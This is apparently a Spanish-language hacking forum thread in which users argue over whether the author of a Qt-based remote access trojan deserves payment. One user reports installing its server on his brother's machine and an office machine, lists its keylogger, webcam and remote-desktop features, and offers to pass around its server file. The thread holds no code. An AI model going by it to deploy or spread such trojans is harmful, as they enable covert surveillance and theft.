22-04-2011, 02:02
Espero con ansias ese link, aunque lo sigo intentando y sigue dandome errores <.<. Muchas gracias ;)

chewarrior
23-04-2011, 01:30
Yo es que no le veo la gracia a esto, toma QT y toma api de windows, esto tiene menos misterio xd, si es que me parece que los sock estan controlados por QT ooooooooooo, encima lo quiere vender ¿?, pero esto que es ¿?, si es C++ y con una api libre y quieres venderlo, tu no tienes verguenza ni sabras nunca que significa este mundo, ya de antemano te lo digo, no tienes futuro.







Entiendes ya por qué no quiero darlo? Bueeeeno... lo subo a mediafire y pongo el link aquí...


XD.



Espero con ansias ese link, aunque lo sigo intentando y sigue dandome errores <.<. Muchas gracias


XD*2.

hckr
23-04-2011, 11:56
Ahhh perdón Heckutoru!! Que era ironía! jejeje hay que compilárselo uno mismo... Busca por Google que así lo hice yo.

Cierto, Chewarrior... esto no tiene mérito ninguno, pero que se le va a hacer...

paju1986
07-05-2011, 02:44
No me puedo creer que por desarrollar un programa libre y gratuito para todos te escupan a la cara, ¿Que tipo de personas sois?.

4v7n42
07-05-2011, 05:35
No me puedo creer que por desarrollar un programa libre y gratuito para todos te escupan a la cara, ¿Que tipo de personas sois?.

¿Y por ser libre y gratuito el programa te exceptúa de recibir criticas?

Simplemente el que sepa compilar no te va a pagar y el que no sepa compilar tampoco te va a pagar para curiosear, va a usar uno de los otros tantos troyanos libres y gratuitos (ya compilados y con reputacion probada) que existen.

clarinetista
07-05-2011, 11:09
En ningún momento se te ha escupido a la cara, cada usuario vertió sus opiniones, que es lo que pedías en el primer post.
Yo es que lamentablemente no he tenido tiempo de probarlo así que no puedo opinar sobre ello

3ndp01nt
07-05-2011, 13:01
No me puedo creer que por desarrollar un programa libre y gratuito para todos te escupan a la cara, ¿Que tipo de personas sois?.

¿Qué quieres que te aplaudamos por reescribir el buscaminas, con Qt, y cobrar por la versión compilada, sobre todo, por la innovación?.

Un saludo.

hckr
07-05-2011, 14:43
REPITO: ¿Tenemos que hacerle la ola por hacer un software libre y liberar el código? Así es como debe de ser...

Goatse
07-05-2011, 14:52
Anda que vaya paliza estáis dando al pobre.

clarinetista
08-05-2011, 20:56
Si es que mira que sois .......

CARLOSVM
29-01-2012, 23:03
Pues ahora llego yo a añadir leña al fuego...Es broma...
Lo primero quiero decir que este trabajo me parecio mmmmuy bueno e intente compilar ambas versiones,la 2 y la 3.0,pero siempre me quedaba en el mismo error...Ya despues de 1 semana perdiendo 2-3 horas me di por vencido...Es que tampoco hay mucha ayuda que digamos...(Cosa que veo muy bien ya que es algo muy personal que solo el creador conoce a la perfeccion..y si no como iba a cobrar por ello?todos lo podriamos compilar con el manual del blog)

Ahora tengo una duda,alguien lo ha conseguido compilar?? Ahi lo dejo....

Por otro lado pienso que cada cual es libre de cobrar por sus creaciones,tambien hay que decir que ha trabajado mucho para hacer esto,esta claro...Pero antes de cobrar por algo hay que estar 100% seguro de que funciona,si no....

Por cierto el Avg me tiraba un virus con mingw32-g++.exe,mingw32c+.exe,g++.exe y c++.exe....Tras intentar compilarlo...

Bueno al final me baje el server 2.0 para windows pero estaba "muy justito" y me descargue la version 3.0,habia leido muchas mejoras y me parecio lo mejor.

Me autoinfecté y corria perfecto!!Exceptuando el keylogger...

Luego instale 1 server en una maquina con Xp y otro server en otra con W7,una de ellas en casa de mi hermano y la otra en la oficina (osea diferentes redes)

En mi pc con W7 instale el cliente (el cliente usa una cuenta jabberes.org y el server de ambas maquinas otra,para no tener conflictos de conexion con una sola).

Arranco el cliente con mi cuenta y me llegan al momento las 2 maquinas!!PERFECTO!
Ahora los errores:

Escritorio remoto,webcam,mensajes de alerta NO FUNCIONAN,hacen que el cliente se cierre.El keylogger no funciona EN ABSOLUTO
El administrador de archivos,funciona MUY mal,no responde bien y la mitad de las veces no muestra nada,la vista previa de unas 20 fotos me ha mostrado 1.Y si vas a descargar algo al pc cliente,te lo descarga pero inservible...No lo puedes abrir...

Despues de tanto que se ha hablado de si deberia ser gratis y demas llego yo con que no funciona bien...Por lo tanto es tirar el dinero ya que tiene DEMASIADOS errores que lo hacen practicamente inservible...Entonces pagar por esto es tonteria ya que lo suyo es descargarselo y conseguir compilarlo,al menos de esta manera gracias al trabajazo del autor con este Rat algunos aprenderan un poquito de compilar...

Puesto que tampoco nos da un soporte en estos casos...NO SE DEBERIA PAGAR...Aunque la cantidad sea mínima (es una miseria) no se puede decir que paguemos si queremos una version funcional ya que NO LO ES y esos € que hemos tirado descargando algo que no funciona bien podemos gastarlos no se en cualquier otra cosa....

Alguien que lo haya descargado o compilado y podamos intercambiarnos ayuda?

Y ya mi ultima opinion si alguien pide un pequeño manual de como crear el server yo se lo hago,es la cosa mas facil del mundo,es que por ahi he leido en un par de paginas que se ha pedido eso y el creador ha dicho a ver si alguien esta dispuesto a hacerlo...

CONCLUSION
Enhorabuena por tu trabajo,sinceramente
Pero no puedes vender algo que no está terminado y decir que es funcional y mejoras añadidas puesto que dichas mejoras no funcionan nada bien...

hckr
30-01-2012, 16:54
CarlosVM, estoy totalmente de acuerdo contigo.

Yo lo logré compilar después de horas y horas... No sé ni como lo hice. Si encuentro el archivo te lo paso, pero lo perdí al formatear. Se lo pasé a unos cuantos de este foro, a ver si me lo pasan de nuevo.

Bueno, ya verás mi postura leyendo los otros mensajes...


Un saludo.

CARLOSVM
30-01-2012, 18:36
Sinceramente me sabe fatal tener que tener esta opinion negativa puesto que es un trabajazo pero es que...Es un poco vergonzoso cobrar por esto si encima no funciona nada bien,ya sin entrar en dilemas como al principio del post...

Ademas recalco la nula ayuda que hay respecto a dichos bugs...Yo muy esperanzado en comprobar que funciona bien para despues compilarlo,me direis para que?vaya ganas! Pues porque QUIERO COMPILARLO YO MISMO Y MODIFICARLO,os reireis puesto que no tengo ni pajolera idea,pero si muuucho tiempo libre,paciencia y me apasiona este mundo...:0=:0=:0=

Si quieres te paso una copia del 3.0,tambien tengo el 2.0 pero mejor centrarse en lo nuevo...

Ah se me olvido preguntar si el tema del puerto en el equipo servidor teneis el mismo problema?Cuando lo inicias te pide permisos de firewall...Y la verdad es que seria perfecto que no pasara eso...:confused::confused:

Bueno yo ya le envie un e-mail al creador,postee en varios sitios a ver si alguien mas se pronuncia y de momento nada...

hckr
30-01-2012, 22:55
Olvidate porque el creador no se va a pasar por este foro en un tiempo... Le dejamos mal sabor de boca :D

Pues no nos reímos, al contrario: te felicitamos. Eso demuestra que no eres el típico lammer que descarga-compila-ejecuta... A mí también me parece un buen trabajo este troyano, (y probablemente yo no lo habría conseguido desarrollar así en muchísimo tiempo) pero como tú dices, cobrar por algo así... Y encima, para colmo, pone restricciones... y complicaciones. En mi portátil me tiré 2 horas y media sólo y exclusivamente para hacer el config...

Te animo a que sigas intentando toquetear con el Qt, y a modificar lo que ya tienes... pues por algo se empieza. Cuando no sabes crear algo desde cero, es mejor modificar lo que pilles por ahí... cambiando valores y eso.

Un saludo y suerte.

CARLOSVM
31-01-2012, 00:34
Me apasiona este mundo,no he estudiado nada pero llevo 4-5 años buscandome la vida con la informatica...recuerdo una vez que me encargaron el mantenimiento de una web en Joomla (jamas habia visto eso) pero dije que si,que paso?que me pegue 16 horas seguidas para hacer algo que al dia siguiente hice en 10 minutos...Mi primera vez en montar un pc?buff,ahora te lo hago en 20 minutos como maximo...(quizas tardo tanto porque mas q saber a montar eso q este haciendo ,quiero saber que hago y porque...):confused::confused::confused:

Mi conclusion?SI QUIERES PUEDES Y YO QUIERO!!Y como bien has dicho tu teniendo este codigo pues tengo muuucho camino adelantado para mi primera compilacion...La segunda ira desde cero...Por alla por el 2051 mas o menos:p:p

Lo dicho,si quieres el rawserver....Pidemelo y te lo paso!capaz que entre todos queda un proyecto PERFECTO y le hacemos la competencia al creador...jajajaja
Es broma!

Nadie se atreve a empezar el nuevo demonio rat 4? a partir de este codigo?jajaja.Bromas aparte...Podriamos hacer algo,no?

Por cierto esta tarde he comentado algo en una web,no puedo decir cual,no quiero hacer Spam y milagrosamente el post ENTERO ha desaparecido:mad::mad::mad::mad:,era una de mis webs de referencia en el tema hack (no lammer,que quede claro) y la de muchos estoy SEGURO,bueno si se me permite pongo la primera letra de dicha web "I",ya sabreis cual es quienes estais en esto...

Quien se anima a seguir con esto?Un saludo Hckr!!! Doy el rawserver.dat,pero eso si teniendo la certeza de que sea un hacker y no un lammer (bueno tampoco le serviria de mucho...)

hckr
31-01-2012, 16:12
Te lo pido por privado, muchas gracias.

Lo que propones está bien, pero mejor empezar desde 0 no? :) Lástima que en HH tenemos ya muchos proyectos... Pásate por el talller de programación de mi firma y pruebalo, e informate un poco.